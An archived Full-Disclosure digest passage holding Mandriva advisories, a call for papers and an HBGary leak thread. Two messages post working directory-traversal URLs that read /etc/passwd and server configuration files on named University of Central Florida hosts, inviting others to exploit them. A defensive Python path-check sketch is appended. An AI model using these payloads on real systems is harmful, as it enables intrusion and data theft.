> mes5/x86_64/tomcat5-server-lib-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 37d677648216a2d5577db95f0ab9f194
> mes5/x86_64/tomcat5-servlet-2.4-api-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 42077f152ee121ed61cda754200f8902
> mes5/x86_64/tomcat5-servlet-2.4-api-javadoc-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 75657b92a4a6d94e27c3188653cad41e
> mes5/x86_64/tomcat5-webapps-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> a4f9e4804454f2d628865ad654d6a188
> mes5/SRPMS/tomcat5-5.5.27-0.3.0.4mdvmes5.1.src.rpm
> _______________________________________________________________________
>
> To upgrade automatically use MandrivaUpdate or urpmi. The verification
> of md5 checksums and GPG signatures is performed automatically for you.
>
> All packages are signed by Mandriva for security. You can obtain the
> GPG public key of the Mandriva Security Team by executing:
>
> gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
>
> You can view other update advisories for Mandriva Linux at:
>
> http://www.mandriva.com/security/advisories
>
> If you want to report vulnerabilities, please contact
>
> security_(at)_mandriva.com
> _______________________________________________________________________
>
> Type Bits/KeyID Date User ID
> pub 1024D/22458A98 2000-07-10 Mandriva Security Team
> <security*mandriva.com>
>
>
>
> ------------------------------
>
> Message: 13
> Date: Fri, 18 Feb 2011 22:28:03 +0100
> From: Alejandro Cánovas Solbes<alejandro.canovas.cp46700@xxxxxxxxx>
> Subject: [Full-disclosure] Deadline extension | MOBILITY 2011 || July
> 17-22, 2011 - Bournemouth, UK
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:<201102182128.p1ILS2L6027576@xxxxxxxxxxx>
> Content-Type: text/plain; charset=us-ascii
>
>
> INVITATION:
>
> =================
> Please consider to contribute to and/or forward to the appropriate groups the
> following opportunity to submit and publish original scientific results.
> =================
>
> ============== MOBILITY 2011 | Call for Papers ===============
>
> CALL FOR PAPERS, TUTORIALS, PANELS
>
> MOBILITY 2011: The First International Conference on Mobile Services,
> Resources, and Users
> July 17-22, 2011 - Bournemouth, UK
>
> General page: http://www.iaria.org/conferences2011/MOBILITY11.html
>
> Call for Papers: http://www.iaria.org/conferences2011/CfPMOBILITY11.html
>
> Submission deadline: March 10, 2011
>
> Technical Co-Sponsors:
> - The Bournemouth & Poole College
> - UNIK - University Graduate Center
> - Bournemouth University
> - Movation Collaboration Centre
> - Center for Wireless Innovation, Norway
> - INRIA
> - PT Inovacao
> - Cisco Systems, Inc.
> Sponsored by IARIA, www.iaria.org
>
> Extended versions of selected papers will be published in IARIA Journals:
> http://www.iariajournals.org
> Extended versions of selected papers on vehicular mobility will be published
> in a special issue of IJET Journal:
> http://www.inderscience.com/browse/index.php?journalID=133
>
> Please note the Poster Forum and Work in Progress options.
>
> The topics suggested by the conference can be discussed in terms of concepts,
> state of the art, research, standards, implementations, running experiments,
> applications, and industrial case studies. Authors are invited to submit
> complete unpublished papers, which are not under review in any other
> conference or journal in the following, but not limited to, topic areas.
>
> All tracks are open to both research and industry contributions, in terms of
> Regular papers, Posters, Work in progress, Technical/marketing/business
> presentations, Demos, Tutorials, and Panels.
>
> Before submission, please check and conform with the Editorial rules:
> http://www.iaria.org/editorialrules.html
>
> MOBILITY 2011 Topics (topics and submission details: see CfP on the site)
>
> Mobile architectures, mechanisms, protocols
> Mobility and wireless; Mobility enabling protocols; Mobile software; Service
> composition in mobile environments; Knowledge and service discovery in mobile
> environments; On-demand mobility; User presence in mobile environments;
> Replication in mobile environments; Middleware for mobile environments;
> Internet and mobility; Software architecture for mobile applications
>
> Mobile networking and management
> Fundamentals of mobile networks; Mobile-Fixed interworking; Heterogeneous
> networks; Beyond IMT-A; Mobile network virtualization; Femtocells and relays;
> Mobile cells; Mobile network sharing and network access; Self-management of
> mobile networks; Mobility management; Access control in mobile environments;
> Advanced roaming concepts; Mobile network edge-based service delivery
> platforms; Mobile content delivery networks; Mobile peer-to-peer systems;
> Mobile VPNs; Quality of experience in mobile networks
>
> Mobile devices and services
> Smart mobile devices; Embedded mobile; Sensors and mobiles; Mobile media,
> mobile content; Mobile applications (mobile learning, mobile healthcare,
> etc.); Mobile games; Mobile business; Mobile Web applications; Apps versus
> Web; Novel software concepts for mobile services; Mobile- and micro payment;
> mCommerce
>
> Mobile prosumers and interfaces
> User interaction and mobility; Mobile communities; Mobile Web interfaces and
> interaction techniques; Implementations and experimental mobile systems;
> Mobile Web; Mobile search and advertising
>
> Mobile Internet of Things
> Future mobile Internet; Internet of Things; Machine to Machine, People,
> Business (M2x); Online; Smart Homes; Smart Cities
>
> Vehicular mobile technology
> Architectures and platforms; Vehicular ad hoc networks; Vehicular routing
> metrics and supporting protocols; Mobility management and topology control;
> Standardization of vehicular networks; User aspects; Business enablers
>
> Challenges in mobile environments
> Security and privacy environments; Protection and safety of distributed
> mobile data; Context-aware mobility and privacy; Mobile emergency
> communication and public safety; Location-based services; Micro-payments;
> Accuracy and preciseness in localizing mobile entities
>
> ====================
> MOBILITY General Chair
> Josef Noll, University of Oslo & Movation, Norway
>
> MOBILITY Advisory Committee
> Petre Dini, Concordia University, Canada & IARIA, USA
> Pekka Jappinen, Lappeenranta University of Technology, Finland
> Maode Ma, Nanyang Technological University, Singapore
>
> MOBILITY Industry Liaison Chairs
> Filipe Cabral Pinto, Telecom Inovação S.A., Portugal
> Xiang Song, Microsoft, USA
> Xun Luo, Qualcomm Inc. - San Diego, USA
>
> MOBILITY Special Area Chairs on Video
> Mikko Uitto, VTT Technical Research Centre of Finland, Finland
>
> MOBILITY Special Area Chairs on Mobile Wireless Networks
> Mohammad Mushfiqur Chowdhury, University of Oslo, Norway
> Masashi Sugano, Osaka Prefecture University, Japan
>
> MOBILITY Special Area Chairs on Mobile Web / Application
> In-Young Ko, Korea Advanced Institute of Science and Technology (KAIST), Korea
>
> MOBILITY Special Area Chairs on Context-aware, Media, and Pervasive
> Brent Lagesse, Oak Ridge National Laboratory, USA
>
> MOBILITY Special Area Chairs on Mobile Internet of Things and Mobile
> Collaborations
> Jörn Franke, SAP Research Center - Sophia Antipolis, France
> Nils Olav Skeie, University College Telemark, Norway
>
> MOBILITY Special Area Chairs on Vehicular Mobility
> Gianluca Franchino, CEIICP - Scuola Superiore Sant'Anna - Pisa, Italy
>
> MOBILITY Special Area Chairs on Mobile Cloud Computing
> Chunming Rong, University of Stavanger, Norway
> Josef Noll, Center for Wireless Innovation, Norway
>
> MOBILITY Publicity Chairs
> Aline Carneiro Viana, INRIA Saclay - Ile de France - Orsay, France
> Sarfraz Alam, UNIK-University Graduate Center, Norway
>
> Committee: http://www.iaria.org/conferences2011/ComMOBILITY11.html
> ============================
>
>
>
> ------------------------------
>
> Message: 14
> Date: Fri, 18 Feb 2011 23:10:00 +0100
> From: security@xxxxxxxxxxxx
> Subject: [Full-disclosure] [ MDVSA-2011:031 ] python-django
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:<E1PqYWW-0005jS-I9@xxxxxxxxxxxxxxxxxx>
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> _______________________________________________________________________
>
> Mandriva Linux Security Advisory MDVSA-2011:031
> http://www.mandriva.com/security/
> _______________________________________________________________________
>
> Package : python-django
> Date : February 18, 2011
> Affected: 2010.0, 2010.1
> _______________________________________________________________________
>
> Problem Description:
>
> Multiple vulnerabilities have been found and corrected in python-django:
>
> Django 1.1.x before 1.1.4 and 1.2.x before 1.2.5 does not properly
> validate HTTP requests that contain an X-Requested-With header,
> which makes it easier for remote attackers to conduct cross-site
> request forgery (CSRF) attacks via forged AJAX requests that leverage
> a combination of browser plugins and redirects, a related issue to
> CVE-2011-0447 (CVE-2011-0696).
>
> Cross-site scripting (XSS) vulnerability in Django 1.1.x before
> 1.1.4 and 1.2.x before 1.2.5 might allow remote attackers to inject
> arbitrary web script or HTML via a filename associated with a file
> upload (CVE-2011-0697).
>
> Directory traversal vulnerability in Django 1.1.x before 1.1.4 and
> 1.2.x before 1.2.5 on Windows might allow remote attackers to read or
> execute files via a / (slash) character in a key in a session cookie,
> related to session replays (CVE-2011-0698).
>
> The updated packages have been upgraded to the 1.1.4 version which
> is not vulnerable to these issues.
> _______________________________________________________________________
>
> References:
>
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0696
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0697
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0698
> _______________________________________________________________________
>
> Updated Packages:
>
> _______________________________________________________________________
>
> To upgrade automatically use MandrivaUpdate or urpmi. The verification
> of md5 checksums and GPG signatures is performed automatically for you.
>
> All packages are signed by Mandriva for security. You can obtain the
> GPG public key of the Mandriva Security Team by executing:
>
> gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
>
> You can view other update advisories for Mandriva Linux at:
>
> http://www.mandriva.com/security/advisories
>
> If you want to report vulnerabilities, please contact
>
> security_(at)_mandriva.com
> _______________________________________________________________________
>
> Type Bits/KeyID Date User ID
> pub 1024D/22458A98 2000-07-10 Mandriva Security Team
> <security*mandriva.com>
>
>
>
> ------------------------------
>
> Message: 15
> Date: Fri, 18 Feb 2011 23:17:00 +0100
> From: Daniël W. Crompton <daniel.crompton@xxxxxxxxx>
> Subject: Re: [Full-disclosure] Fwd: HBGary Mirrors?
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:
> <AANLkTinx9gtrCkOo1+6x61kq7fJoEtMyHw6PAyCw6LF0@xxxxxxxxxxxxxx>
> Content-Type: text/plain; charset="iso-8859-1"
>
> On 18 February 2011 20:11, Cal Leeming [Simplicity Media Ltd]<
> cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx> wrote:
>
>> I'm wondering along the same lines as Thor, based on intent. One of those
>> "don't take the piss or the judge is gonna own you" scenarios that would be
>> tested in court on a per trial basis. Like, if the files were known to
>> contain encrypted info, and if it was proved that you knew the contents of
>> those files, then you would be held liable.
>
> Unless you have actually decrypted the file you would not "know" what was in
> the file, you would be relying on what the person who gave you the file told
> you. I assume this would be some kind of hearsay, although a judge might
> consider you an accessory after the fact or a (co-)conspirator which in some
> cases might result in a higher sentence than the original crime.
>
> D.
>
>
> blaze your trail
>
> --
> Daniël W. Crompton <daniel.crompton@xxxxxxxxx>
>
> <http://specialbrands.net/>
> <http://twitter.com/webhat>
> <http://www.facebook.com/webhat><http://plancast.com/webhat><http://www.linkedin.com/in/redhat>
>
> ------------------------------
>
> Message: 16
> Date: Fri, 18 Feb 2011 13:28:21 -0500
> From: William Warren<hescominsoon@xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
> Subject: Re: [Full-disclosure] HBGary Mirrors?
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:<4D5EBA45.9090409@xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
> Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
> On 2/18/2011 11:24 AM, ck wrote:
>> So, the FEDs shut down all mirrors of the HBGary files - or didn't they?
>>
>> ck
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
> i've got a copy..:)
>
>
>
> ------------------------------
>
> Message: 17
> Date: Sat, 19 Feb 2011 01:08:56 -0500
> From: Hack Talk<hacktalkblog@xxxxxxxxx>
> Subject: [Full-disclosure] University of Central Florida Multiple LFI
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:
> <AANLkTi=oyDpNL6Jgu8Ms=btLaZdjUkvyhFxXLH8vDjj0@xxxxxxxxxxxxxx>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Found these and thought I'd share:
>
> -==================-
> http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00
> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
> -==================-
> Let me know if you do anything fun with 'em
>
> Luis Santana - Security+
> Administrator - http://hacktalk.net
> HackTalk Security - Security From The Underground
>
> ------------------------------
>
> Message: 18
> Date: Sat, 19 Feb 2011 16:34:21 +0530
> From: Madhur Ahuja<ahuja.madhur@xxxxxxxxx>
> Subject: Re: [Full-disclosure] University of Central Florida Multiple
> LFI
> To: Hack Talk<hacktalkblog@xxxxxxxxx>
> Cc: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:
> <AANLkTimd5F1Kgw1uCO_UGgX3mVUiMuU9jaisp6K=SM-K@xxxxxxxxxxxxxx>
> Content-Type: text/plain; charset="utf-8"
>
> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00
>
> On Sat, Feb 19, 2011 at 11:38 AM, Hack Talk<hacktalkblog@xxxxxxxxx> wrote:
>
>> Found these and thought I'd share:
>>
>> -==================-
>>
>> http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00
>>
>> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
>> -==================-
>> Let me know if you do anything fun with 'em
>>
>> Luis Santana - Security+
>> Administrator - http://hacktalk.net
>> HackTalk Security - Security From The Underground
>>
>>
>
> ------------------------------
>
>
> End of Full-Disclosure Digest, Vol 72, Issue 44
> ***********************************************
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
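
The quoted MDVSA-2011:031 advisory describes CVE-2011-0698 as a directory traversal reached through a slash in a session cookie key. The sketch below is an added example, not Django's code or the vendor patch: it puts an unchecked key-to-file mapping beside a hardened one that allow-lists the key and then confirms the resolved path stays in the session directory, which generalises the check to any platform. All names (`safe_key_to_file`, `FILE_PREFIX`, the allow-list) and the sample keys are assumptions constructed for illustration.

```python
import os
import string
import tempfile

# Assumption for this example: keys are lowercase alphanumeric tokens.
VALID_KEY_CHARS = frozenset(string.ascii_lowercase + string.digits)
MAX_KEY_LEN = 64
FILE_PREFIX = "sessionid"  # hypothetical file-name prefix


class InvalidSessionKey(ValueError):
    """Raised when a client-supplied session key must not reach the filesystem."""


def is_inside(base_dir, path):
    """True if path resolves to a location strictly below base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(path)
    return target != base and os.path.commonpath([base, target]) == base


def unsafe_key_to_file(storage_dir, key):
    """'Before' form: the cookie value is concatenated into a path unchecked."""
    return os.path.join(storage_dir, FILE_PREFIX + key)


def safe_key_to_file(storage_dir, key):
    """Hardened form: allow-list the key, then confirm containment."""
    if not isinstance(key, str) or not 0 < len(key) <= MAX_KEY_LEN:
        raise InvalidSessionKey("bad key length or type")
    if not set(key) <= VALID_KEY_CHARS:
        raise InvalidSessionKey("key contains characters outside the allow-list")
    path = os.path.join(storage_dir, FILE_PREFIX + key)
    if not is_inside(storage_dir, path):
        raise InvalidSessionKey("resolved path leaves the session directory")
    return path


def check_keys(storage_dir, keys):
    """Return {key: (unsafe_path_stays_inside, hardened_verdict)} for each key."""
    results = {}
    for key in keys:
        unsafe_ok = is_inside(storage_dir, unsafe_key_to_file(storage_dir, key))
        try:
            safe_key_to_file(storage_dir, key)
            verdict = "accepted"
        except InvalidSessionKey:
            verdict = "rejected"
        results[key] = (unsafe_ok, verdict)
    return results


# Constructed sample cookie values (not taken from any real request).
SAMPLE_KEYS = [
    "3f9a1c0de4b7428e9d6a5b1c2e7f0a94",  # well-formed key
    "/../../outside",                    # forward slash in the key
    "\\..\\..\\outside",                 # backslash: a separator only on Windows
    "",                                  # empty key
]

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        store = os.path.join(root, "sessions")
        os.mkdir(store)
        for key, (unsafe_ok, verdict) in check_keys(store, SAMPLE_KEYS).items():
            print(f"{key!r:40} unsafe stays inside: {unsafe_ok!s:5} hardened: {verdict}")
```

The backslash sample shows why the allow-list comes first: on a POSIX host the path check alone would pass it, while the same bytes act as a separator on Windows.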